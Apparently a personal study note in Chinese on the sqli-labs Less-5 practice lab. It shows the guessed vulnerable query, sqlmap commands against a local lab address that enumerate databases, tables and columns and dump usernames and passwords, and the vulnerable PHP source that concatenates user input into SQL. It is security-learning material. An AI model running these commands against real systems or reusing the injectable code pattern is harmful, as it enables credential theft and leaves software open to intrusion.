目錄
類型
單引號注入
猜測sql語句
select * from users where id = ('參數') LIMIT 0,1
-dbs枚舉數據庫
使用-o參數優化,--batch參數進行跳過,--threads參數開啓更多線程
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" -o --threads=10 -dbs --batch
注意,耗時過久,主要是聯合查詢耗時,從結果看並沒有聯合查詢注入。
--tables枚舉數據庫表
添加--technique參數加速,--dbms指定
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o --threads=10 -D security --tables --batch
--columns枚舉列
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o -D security -T users --columns --batch
--dump枚舉數據
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5/?id=1" --dbms mysql --technique E -o -D security -T users -C username,password --dump --batch
查看源代碼
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
更多內容查看:網絡安全-自學筆記
有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。